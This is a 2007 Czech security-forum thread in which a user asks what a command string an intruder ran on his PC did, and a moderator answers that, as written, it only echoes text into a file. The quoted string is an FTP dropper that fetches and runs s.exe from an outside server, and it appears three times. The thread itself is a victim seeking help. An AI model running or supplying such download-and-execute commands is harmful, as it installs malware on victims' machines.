Hacknuté PC - žurnál

Antivirové programy, firewally, viry, spyware, aktuální hrozby

Moderátor: Moderátoři Živě.cz

Odeslat příspěvekod Krouta 5. 2. 2007 08:53

Zjistil jsem, že se mi někdo naboural do PC spustil tento řetězec příkazů:

cmd /c echo open ftp.volja.net 21 >> ik echo user uros777 blech777 >> ik echo binary >> ik echo get s.exe >> ik echo bye >> >>ik echo ftp -n -v -s : ik del ik s.exe exit

Může mi někdo vysvětlit, co tam provedl (spustil ftp a stáhnul něco nebo použil moje pc na připojení na cizí ftp)?
Krouta
Kolemjdoucí

Odeslat příspěvekod Dany0 5. 2. 2007 22:05

Krouta píše:Zjistil jsem, že se mi někdo naboural do PC spustil tento řetězec příkazů:

cmd /c echo open ftp.volja.net 21 >> ik echo user uros777 blech777 >> ik echo binary >> ik echo get s.exe >> ik echo bye >> >>ik echo ftp -n -v -s : ik del ik s.exe exit

Může mi někdo vysvětlit, co tam provedl (spustil ftp a stáhnul něco nebo použil moje pc na připojení na cizí ftp)?
Dany0
Trvalý BAN

Odeslat příspěvekod Nargon 5. 2. 2007 22:22

Pokud spustil tento jeden prikaz tak nic neudelal :)

prikaz
Kód: Vybrat vše
cmd /c
spusti prikazovej radek a po provedeni prikazu ho zavre.
a jako prikaz byl pouzit:
Kód: Vybrat vše
echo open ftp.volja.net 21 >> ik echo user uros777 blech777 >> ik echo binary >> ik echo get s.exe >> ik echo bye >> >>ik echo ftp -n -v -s : ik del ik s.exe exit

A protoze to je vlastne jeden prikaz, tedy prikaz "ECHO" a za nim hodmada parametru tak to jen vypise ten zbytek. A diky pouziti presmerovani do souboru ">> ik" se to zapise do souboru ik. ale nic spatnyho se nestane, cele se to zapise do souboru, a nic se nespusti.
Nargon
Moderátor